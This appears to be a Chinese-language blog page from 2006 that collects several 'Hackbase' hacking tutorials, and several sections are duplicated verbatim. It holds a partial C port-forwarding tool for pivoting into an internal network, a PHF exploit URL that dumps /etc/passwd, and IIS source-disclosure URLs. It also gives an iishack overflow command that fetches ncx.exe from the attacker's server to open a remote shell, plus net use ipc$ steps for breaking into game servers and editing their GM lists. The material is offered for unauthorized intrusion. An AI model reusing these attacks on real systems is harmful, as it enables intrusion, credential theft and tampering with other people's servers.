<<第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網>>
假設敵人網絡拓撲如下圖所示,沒有安裝防火牆或在網關服務器上做TCP/IP限制。
我們的目標是連接上敵人內網的Terminal
Server[192.168.1.3],因為沒有辦法直接和他建立連接,那麼只有先從它的網關服務器上下手了。假如敵人網關服務器是M$的windows
2k,IIS有Unicode漏洞[現在要找些有漏洞的機器太容易了,但我只是scripts
kid,只會利用現成的漏洞做些簡單的攻擊:(555),那麼我們就得到一個網關的shell了,我們可以在那上面運行我們的程序,雖然權限很低,但也可以做很多事情了。Ok!讓我們來寫一個做TCP
socket數據轉發的小程序,讓敵人的網關服務器忠實的為我[202.1.1.1]和敵人內網的TermServer[192.168.1.3]之間轉發數據。題外話:實際入侵過程是先取得網關服務器的權限,然後用他做跳板,進一步摸清它的內部網絡拓撲結構,再做進一步的入侵,現在敵人的網絡拓撲是我們給他設計的,哈哈。
攻擊流程如下:
<1>在網關服務器202.2.2.2運行我們的程序AgentGateWay,他監聽TCP
3389端口[改成別的,那我們就要相應的修改TermClient了]等待我們去連接。
<2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。
<3>202.2.2.2.接受202.1.1.1的連接,然後再建立一個TCP
socket連接到自己內網的TermServer[192.168.1.3]
<4>這樣我們和敵人內網的TermServer之間的數據通道就建好了,接下來網關就忠實的為我們轉發數據啦。當我們連接到202.2.2.2:3389的時候,其實出來的界面是敵人內網的192.168.1.3,感覺怎麼樣?:)
程序代碼如下:
/**********************************************************************
Module Name:AgentGateWay.c
Date:2001/4/15
CopyRight(c) eyas
說明:端口重定向工具,在網關上運行,把端口重定向到內網的IP、PORT,
就可以進入內網了
sock[0]==>sClient sock[1]==>sTarget
**********************************************************************/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//監聽端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
WSADATA wsd;
SOCKET sListen=INVALID_SOCKET,//本機監聽的socket
sock[2];
struct sockaddr_in Local,Client,Target;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
- Nov 26 Sun 2006 13:50
<Hackbase>入侵服務器
網上有許多網友提出這樣的問題:究竟網站的主頁是如何被黑的?黑客們到底是如何入侵服務器的?
在討論這部分知識前,讀者需要知道——入侵網站是非法的;但是在網絡上找到網站的入侵漏洞並通知該網站是受到歡迎的。為什麼要這樣尋找入侵漏洞或入侵哪,著名的黑客H ackalot說過「入侵網站是利用所學的知識來學習新的知識的一種辦法」,這也就是中國人所常說的「溫故而知新」。
【原理】
儘管為服務器設計軟件的軟件工程師們想方設法提高系統的安全性,然而由於系統管理員的水平參差不齊或安全意識底下,往往給黑客提供了入侵的機會。
其實每一個黑客都有自己獨到的方法。筆者對於入侵網站服務器的資料收集了很多,但是因為實際情況的不同,往往造成許多方法的失效;由此可見,每一個網站的情況都不同,需要入侵者區分對待。假設深圳的線路比北京的線路要好的多,從而給了詞典窮舉很大的方便,深圳用戶就可以依靠這個優勢在線攻擊口令,作為北京的用戶就需要優先考慮其它辦法了。針對這麼多的入侵手段,筆者參考H ackalot先生這位黑客界名人的一篇文章給大家介紹一下入侵網站的基本步驟。
分析一部分的主頁被黑的事例可以發現使用入侵者最熱衷於入侵Web服務器和FTP服務器,因為相對來說這是最簡單的兩種途徑。在假設讀者對U NIX系統和WEB SERVER的知識不曾瞭解的情況下,筆者給出下面的步驟。
一、瞭解要入侵的系統
現在網絡上用作服務器的操作系統以UNIX和Linux為主流,如果要入侵這些系統則必須對它們有一個瞭解。
大部份在 DOS 上使用的指令在 UNIX 及 Linux 上都有對應的指令(因為早期的dos開發借鑒了UNIX),以下列出在使用 SHELL帳號 (shell account)時最主要的一些指令對應的dos指令:
HELP=HELP
CP=COPY
MV= MOVE
LS= DIR
RM =DEL
CD=CD
要看誰同時也在該系統上用戶可以鍵入 WHO 指令,要知道系統上某一位使用者的資料, 可以鍵入 FINGER。這些基本的 UNIX 指令可以讓你得到你正使用系統的信息。
二、破解密碼
在UNIX操作系統中, 所有系統使用者的密碼都存放在一個文件中,這個文件存放在 /etc這個目錄下面, 它的文件名就叫做passwd。如果讀者認為所要做的工作就是拿到這個文件按照上面的密碼登陸系統的話那就大錯特錯了。UNIX和Linux下的p asswd文件是特殊的,在它裡面所有帳號的密碼都已經經過重新編譯的(也就是前面說過的DES加密方法),而且這些密碼所進行的都是單向編譯( one-way encrypted),也就是說沒有辦法可以反編譯它的(decrypt)。
但是還是有些程序可以得到這些原始的密碼。筆者向大家推薦一個破解密碼的程序「Cracker Jack」,它也是一個使用字典來對字典文件進行窮舉的軟件。首先「Cracker Jack」會把字典文件裡的每一個值進行編譯,然後將編譯過的值與密碼文件中的內容進行比較,得到相同的結果就會報告對應的未經編譯密碼。這個軟件巧妙的繞過密碼無法反編譯的限制,使用窮舉比較獲得密碼。使用這種原理獲得密碼的工具有許多,讀者可以到網絡上去搜尋一下。
三、獲得密碼文件
這是最困難的一部分。很明顯,如果管理員有那麼一個密碼文件的話他當然不會放在那裡讓其它人舒舒服服的拿到的。入侵者必須找到好方法以不進入系統的方式拿到密碼文件。這裡筆者向大家介紹兩種方法,大家可以試試,有可能會成功。
1.tc目錄在FTP服務上不會被鎖住,入侵可以用FTP client程序使用anoymously匿名帳號登陸,然後檢查一下/etc/passwd是否為匿名設置了被讀取的權限,如果有馬上備份下來使用軟件解碼。
2.些系統中,/cgi-bin目錄下會有個叫PHF的文件,如果準備入侵的服務器上有的話那就要方便的多了。因為PHF允許使用者對網站系統裡的文件作遠端讀取,以此為據,用戶可以使用瀏覽器抓取p asswd文件,只要在瀏覽器地址欄中鍵入URL:http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd,其中xxx.xxx.xxx 是要入侵的網站名。
如果這兩種方法都行不通的話,那入侵者必須實施其它的辦法了。
在有些情況下入侵者找到的密碼文件的第二部分是X、!或者*,那麼說明該密碼文件已經被鎖死,這是系統管理員使用的加強安全的手段之一。但是將密碼文件完全隱藏起來的情況是不太有的。通常情況下都會有未經鎖死的密碼文件備份在系統中,這樣入侵者就可以加以利用,比如:入侵者通常會尋找/ etc/shadow目錄或類似的目錄,看能否找到密碼文件的備份。
四、建立自己的shell帳號
經過二、三兩個關鍵的步驟入侵者終於拿到了關鍵的密碼文件,並且破解出了密碼。現在可以運行TELNET程序,登陸主機了。當連上服務器時服務器會向你顯示自己的一些信息,通常是U NIX、linux、 aix、 irix、 ultrix、 bsd 甚至是 DOS 和VAX/Vms;然後是Login提示符出現在屏幕上,這時鍵入得來的帳號和密碼即可登陸系統。此時入侵者就可以利用自己的UNIX知識做自己喜歡做的事了。
最後對一份密碼文件做一個分析,該文件內容如下:
root:1234aaab:0:1:Operator:/:/bin/csh
nobody:*:12345:12345::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
sun:123456hhh:0:1:Operator:/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
sysdiag:*:0:1:Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System
Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
tom:456lll45uu:100:20::/home/tom:/bin/csh
john:456fff76Sl:101:20:john:/home/john:/bin/csh
henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh
在討論這部分知識前,讀者需要知道——入侵網站是非法的;但是在網絡上找到網站的入侵漏洞並通知該網站是受到歡迎的。為什麼要這樣尋找入侵漏洞或入侵哪,著名的黑客H ackalot說過「入侵網站是利用所學的知識來學習新的知識的一種辦法」,這也就是中國人所常說的「溫故而知新」。
【原理】
儘管為服務器設計軟件的軟件工程師們想方設法提高系統的安全性,然而由於系統管理員的水平參差不齊或安全意識底下,往往給黑客提供了入侵的機會。
其實每一個黑客都有自己獨到的方法。筆者對於入侵網站服務器的資料收集了很多,但是因為實際情況的不同,往往造成許多方法的失效;由此可見,每一個網站的情況都不同,需要入侵者區分對待。假設深圳的線路比北京的線路要好的多,從而給了詞典窮舉很大的方便,深圳用戶就可以依靠這個優勢在線攻擊口令,作為北京的用戶就需要優先考慮其它辦法了。針對這麼多的入侵手段,筆者參考H ackalot先生這位黑客界名人的一篇文章給大家介紹一下入侵網站的基本步驟。
分析一部分的主頁被黑的事例可以發現使用入侵者最熱衷於入侵Web服務器和FTP服務器,因為相對來說這是最簡單的兩種途徑。在假設讀者對U NIX系統和WEB SERVER的知識不曾瞭解的情況下,筆者給出下面的步驟。
一、瞭解要入侵的系統
現在網絡上用作服務器的操作系統以UNIX和Linux為主流,如果要入侵這些系統則必須對它們有一個瞭解。
大部份在 DOS 上使用的指令在 UNIX 及 Linux 上都有對應的指令(因為早期的dos開發借鑒了UNIX),以下列出在使用 SHELL帳號 (shell account)時最主要的一些指令對應的dos指令:
HELP=HELP
CP=COPY
MV= MOVE
LS= DIR
RM =DEL
CD=CD
要看誰同時也在該系統上用戶可以鍵入 WHO 指令,要知道系統上某一位使用者的資料, 可以鍵入 FINGER。這些基本的 UNIX 指令可以讓你得到你正使用系統的信息。
二、破解密碼
在UNIX操作系統中, 所有系統使用者的密碼都存放在一個文件中,這個文件存放在 /etc這個目錄下面, 它的文件名就叫做passwd。如果讀者認為所要做的工作就是拿到這個文件按照上面的密碼登陸系統的話那就大錯特錯了。UNIX和Linux下的p asswd文件是特殊的,在它裡面所有帳號的密碼都已經經過重新編譯的(也就是前面說過的DES加密方法),而且這些密碼所進行的都是單向編譯( one-way encrypted),也就是說沒有辦法可以反編譯它的(decrypt)。
但是還是有些程序可以得到這些原始的密碼。筆者向大家推薦一個破解密碼的程序「Cracker Jack」,它也是一個使用字典來對字典文件進行窮舉的軟件。首先「Cracker Jack」會把字典文件裡的每一個值進行編譯,然後將編譯過的值與密碼文件中的內容進行比較,得到相同的結果就會報告對應的未經編譯密碼。這個軟件巧妙的繞過密碼無法反編譯的限制,使用窮舉比較獲得密碼。使用這種原理獲得密碼的工具有許多,讀者可以到網絡上去搜尋一下。
三、獲得密碼文件
這是最困難的一部分。很明顯,如果管理員有那麼一個密碼文件的話他當然不會放在那裡讓其它人舒舒服服的拿到的。入侵者必須找到好方法以不進入系統的方式拿到密碼文件。這裡筆者向大家介紹兩種方法,大家可以試試,有可能會成功。
1.tc目錄在FTP服務上不會被鎖住,入侵可以用FTP client程序使用anoymously匿名帳號登陸,然後檢查一下/etc/passwd是否為匿名設置了被讀取的權限,如果有馬上備份下來使用軟件解碼。
2.些系統中,/cgi-bin目錄下會有個叫PHF的文件,如果準備入侵的服務器上有的話那就要方便的多了。因為PHF允許使用者對網站系統裡的文件作遠端讀取,以此為據,用戶可以使用瀏覽器抓取p asswd文件,只要在瀏覽器地址欄中鍵入URL:http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd,其中xxx.xxx.xxx 是要入侵的網站名。
如果這兩種方法都行不通的話,那入侵者必須實施其它的辦法了。
在有些情況下入侵者找到的密碼文件的第二部分是X、!或者*,那麼說明該密碼文件已經被鎖死,這是系統管理員使用的加強安全的手段之一。但是將密碼文件完全隱藏起來的情況是不太有的。通常情況下都會有未經鎖死的密碼文件備份在系統中,這樣入侵者就可以加以利用,比如:入侵者通常會尋找/ etc/shadow目錄或類似的目錄,看能否找到密碼文件的備份。
四、建立自己的shell帳號
經過二、三兩個關鍵的步驟入侵者終於拿到了關鍵的密碼文件,並且破解出了密碼。現在可以運行TELNET程序,登陸主機了。當連上服務器時服務器會向你顯示自己的一些信息,通常是U NIX、linux、 aix、 irix、 ultrix、 bsd 甚至是 DOS 和VAX/Vms;然後是Login提示符出現在屏幕上,這時鍵入得來的帳號和密碼即可登陸系統。此時入侵者就可以利用自己的UNIX知識做自己喜歡做的事了。
最後對一份密碼文件做一個分析,該文件內容如下:
root:1234aaab:0:1:Operator:/:/bin/csh
nobody:*:12345:12345::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
sun:123456hhh:0:1:Operator:/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
sysdiag:*:0:1:Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System
Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
tom:456lll45uu:100:20::/home/tom:/bin/csh
john:456fff76Sl:101:20:john:/home/john:/bin/csh
henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh
- Nov 26 Sun 2006 13:45
<Hackbase>IIS攻擊大全
1.介紹
這裡介紹的方法主要通過端口80來完成操作,具有很大的威脅性,因為作為網絡服務器80端口總要打開的。如果想方便一些,下載一些WWW、CGI掃瞄器來輔助檢查。
而且要知道目標機器運行的是何種服務程序,你可以使用以下命令:
telnet 《目標機》 80
GET HEAD / HTTP/1.0
就可以返回一些域名和WEB服務程序版本,如果有些服務器把WEB服務運行在8080,81,8000,8001口,你就TELNET相應的口上。
2.常見漏洞
(1)、Null.htw
IIS如果運行了Index Server就包含了一個通過Null.htw有關的漏洞,即服務器上不存在此.htw結尾的文件。這個漏洞會導致顯示ASP腳本的源代碼, global.asa裡面包含了用戶帳戶等敏感信息。如果攻擊者提供特殊的URL請求給IIS就可以跳出虛擬目錄的限制,進行邏輯分區和ROOT目錄的訪問。而這個"hit-highlighting"功能在Index Server中沒有充分防止各種類型文件的請求,所以導致攻擊者訪問服務器上的任意文件。Null.htw功能可以從用戶輸入中獲得3個變量:
CiWebhitsfile
CiRestriction
CiHiliteType
你可通過下列方法傳遞變量來獲得如default.asp的源代碼:
http://www.目標機.com/null.htw?CiWebhitsfile=/default.asp%20&%20
CiRestriction=none%20&%20&CiHiliteType=full其中不需要一個合法的.htw文件是因為虛擬文件已經存儲在內存中了。
(2)、MDAC- 執行本地命令漏洞
這個漏洞出現得比較早,但在全球範圍內,可能還有好多IIS WEB服務器存在這個漏洞,就像在今天,還有很多人在用Windows3.2一樣。IIS的MDAC組件存在一個漏洞,可以導致攻擊者遠程執行目標系統的命令。主要核心問題是存在於RDSDatafactory,默認情況下,它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,在默認情況下是SYSTEM用戶。我們可以通過以下辦法測試本機是否存在這個漏洞:
c:\》nc -nw -w 2 《目標機》 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能存在此漏洞且沒有打上補丁,你可以使用rain forest puppy網站的兩個程序進行測(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。
(3)、ASP Dot Bug
這個漏洞出現得比較早了,是Lopht小組在1997年發現的缺陷,這個漏洞也是洩露ASP源代碼給攻擊者,一般在IIS3.0上存在此漏洞,在請求的URL結尾追加一個或者多個點導致洩露ASP源代碼。http://www.目標機.com/sample.asp.
(4)、idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪有些人還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida?後綴到URL會導致IIS嘗試允許通過數據庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.目標機.com/anything.idc 或者 anything.idq
(5)、+.htr Bug
這個漏洞是由NSFOCUS發現的,對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的洩露:
http://www.目標機.com/global.asa+.htr
(6)、NT Site Server Adsamples 漏洞
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者可能獲得一些如數據庫中的DSN,UID和PASS的一些信息,如:
http://www.目標機.com/adsamples/config/site.csc
(7)、IIS HACK
有人發現了一個IIS4.0的緩衝溢出漏洞,可以允許用戶上載程序,如上載netcat到目標服務器,並把cmd.exe綁定到80端口。這個緩衝溢出主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到站點www.technotronic.com中去下載,另外你還需要一台自己的WEB服務器,也可以是虛擬服務器哦。你現在你自己的WEB服務器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:
c:\》iishack.exe 《目標機》 80 《你的WEB服務器》/ncx.exe
然後你就使用netcat來連接你要檢測的服務器:
c:\》nc 《目標機》 80
如果溢出點正確,你就可以看到目標機器的命令行提示,並且是遠程管理權限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附帶的看文件的程序,但不是默認安裝的,這個查看器是在管理員允許查看樣例文件作為聯繫的情況下安裝的。但是,這個查看器並沒有很好地限制所訪問的文件,遠程攻擊者可以利用這個漏洞來查看目標機器上的任意文件內容,但要注意以下幾點:
1.Codebrws.asp 和 Showcode.asp默認情況下不安裝。
2.漏洞僅允許查看文件內容。
3.這個漏洞不能繞過WINDOWS NT的ACL控制列表的限制。
4.只允許同一分區下的文件可以被查看(所以把IIS目錄和WINNT分區安裝是個不錯的方案,這樣也可能比較好的防止最新的IIS5.0的unicode漏洞).
5.攻擊者需要知道請求的文件名。
例如你發現存在這個文件並符合上面的要求,你可以請求如下的命令:
http://www.目標機.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
你就可以查看到codebrws.asp的源代碼了。
你也可以使用showcode.asp來查看文件:
http://www.目標機.com/msadc/samples/selector/showcode.asp?
這裡介紹的方法主要通過端口80來完成操作,具有很大的威脅性,因為作為網絡服務器80端口總要打開的。如果想方便一些,下載一些WWW、CGI掃瞄器來輔助檢查。
而且要知道目標機器運行的是何種服務程序,你可以使用以下命令:
telnet 《目標機》 80
GET HEAD / HTTP/1.0
就可以返回一些域名和WEB服務程序版本,如果有些服務器把WEB服務運行在8080,81,8000,8001口,你就TELNET相應的口上。
2.常見漏洞
(1)、Null.htw
IIS如果運行了Index Server就包含了一個通過Null.htw有關的漏洞,即服務器上不存在此.htw結尾的文件。這個漏洞會導致顯示ASP腳本的源代碼, global.asa裡面包含了用戶帳戶等敏感信息。如果攻擊者提供特殊的URL請求給IIS就可以跳出虛擬目錄的限制,進行邏輯分區和ROOT目錄的訪問。而這個"hit-highlighting"功能在Index Server中沒有充分防止各種類型文件的請求,所以導致攻擊者訪問服務器上的任意文件。Null.htw功能可以從用戶輸入中獲得3個變量:
CiWebhitsfile
CiRestriction
CiHiliteType
你可通過下列方法傳遞變量來獲得如default.asp的源代碼:
http://www.目標機.com/null.htw?CiWebhitsfile=/default.asp%20&%20
CiRestriction=none%20&%20&CiHiliteType=full其中不需要一個合法的.htw文件是因為虛擬文件已經存儲在內存中了。
(2)、MDAC- 執行本地命令漏洞
這個漏洞出現得比較早,但在全球範圍內,可能還有好多IIS WEB服務器存在這個漏洞,就像在今天,還有很多人在用Windows3.2一樣。IIS的MDAC組件存在一個漏洞,可以導致攻擊者遠程執行目標系統的命令。主要核心問題是存在於RDSDatafactory,默認情況下,它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,在默認情況下是SYSTEM用戶。我們可以通過以下辦法測試本機是否存在這個漏洞:
c:\》nc -nw -w 2 《目標機》 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能存在此漏洞且沒有打上補丁,你可以使用rain forest puppy網站的兩個程序進行測(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。
(3)、ASP Dot Bug
這個漏洞出現得比較早了,是Lopht小組在1997年發現的缺陷,這個漏洞也是洩露ASP源代碼給攻擊者,一般在IIS3.0上存在此漏洞,在請求的URL結尾追加一個或者多個點導致洩露ASP源代碼。http://www.目標機.com/sample.asp.
(4)、idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪有些人還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida?後綴到URL會導致IIS嘗試允許通過數據庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.目標機.com/anything.idc 或者 anything.idq
(5)、+.htr Bug
這個漏洞是由NSFOCUS發現的,對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的洩露:
http://www.目標機.com/global.asa+.htr
(6)、NT Site Server Adsamples 漏洞
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者可能獲得一些如數據庫中的DSN,UID和PASS的一些信息,如:
http://www.目標機.com/adsamples/config/site.csc
(7)、IIS HACK
有人發現了一個IIS4.0的緩衝溢出漏洞,可以允許用戶上載程序,如上載netcat到目標服務器,並把cmd.exe綁定到80端口。這個緩衝溢出主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到站點www.technotronic.com中去下載,另外你還需要一台自己的WEB服務器,也可以是虛擬服務器哦。你現在你自己的WEB服務器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:
c:\》iishack.exe 《目標機》 80 《你的WEB服務器》/ncx.exe
然後你就使用netcat來連接你要檢測的服務器:
c:\》nc 《目標機》 80
如果溢出點正確,你就可以看到目標機器的命令行提示,並且是遠程管理權限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附帶的看文件的程序,但不是默認安裝的,這個查看器是在管理員允許查看樣例文件作為聯繫的情況下安裝的。但是,這個查看器並沒有很好地限制所訪問的文件,遠程攻擊者可以利用這個漏洞來查看目標機器上的任意文件內容,但要注意以下幾點:
1.Codebrws.asp 和 Showcode.asp默認情況下不安裝。
2.漏洞僅允許查看文件內容。
3.這個漏洞不能繞過WINDOWS NT的ACL控制列表的限制。
4.只允許同一分區下的文件可以被查看(所以把IIS目錄和WINNT分區安裝是個不錯的方案,這樣也可能比較好的防止最新的IIS5.0的unicode漏洞).
5.攻擊者需要知道請求的文件名。
例如你發現存在這個文件並符合上面的要求,你可以請求如下的命令:
http://www.目標機.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
你就可以查看到codebrws.asp的源代碼了。
你也可以使用showcode.asp來查看文件:
http://www.目標機.com/msadc/samples/selector/showcode.asp?
- Nov 26 Sun 2006 13:43
<Hackbase>遊戲私服安全技巧全攻略之攻擊篇
用的是WINDOWS 2000 SEVER
1 X-SCAN掃瞄IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)
2 打開DOS系統 在DOS下進行*作!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。
進入了以後就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其餘的想怎麼改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。
我在講講我的 ** 傳奇的遭黑的經歷!
首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!
其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!
再次,有非法GM製造物品,以被查出。分析如下:是針對傳奇而來!
解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,並關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多餘的GM,另外仔細一看,在看AdminList.TXT的文件名後面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!
雖然我寫了一些如何進攻和防禦計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
如何在別人的私服做GM?
攻擊初級教學
我在侵入別人4f所使用的方法
看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在裡面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之後。當足了gm的癮,現在我把方法公佈與大家。。。。
其實我所使用的方法很簡單,只有4個工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 「shed.exe」:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這裡面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! 「流光」雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然後先簡單探測,此時有些網管懶惰,把administrator設置的過於簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! 「冰河」,想必許多朋友都玩過,使用冰河控制一台服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳並且控制他呢? 「cmd.exe」 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$ 「password」 /user:」user」 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin裡的。這裡的」ip」就是主機了,「password」就是超級用戶的密碼,「user」就是超級用戶。比如:net use \\210.248.250.2\ipc$ 「maozhiie」 /user:maozhijie
1 X-SCAN掃瞄IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)
2 打開DOS系統 在DOS下進行*作!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。
進入了以後就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其餘的想怎麼改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。
我在講講我的 ** 傳奇的遭黑的經歷!
首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!
其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!
再次,有非法GM製造物品,以被查出。分析如下:是針對傳奇而來!
解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,並關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多餘的GM,另外仔細一看,在看AdminList.TXT的文件名後面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!
雖然我寫了一些如何進攻和防禦計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
如何在別人的私服做GM?
攻擊初級教學
我在侵入別人4f所使用的方法
看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在裡面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之後。當足了gm的癮,現在我把方法公佈與大家。。。。
其實我所使用的方法很簡單,只有4個工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
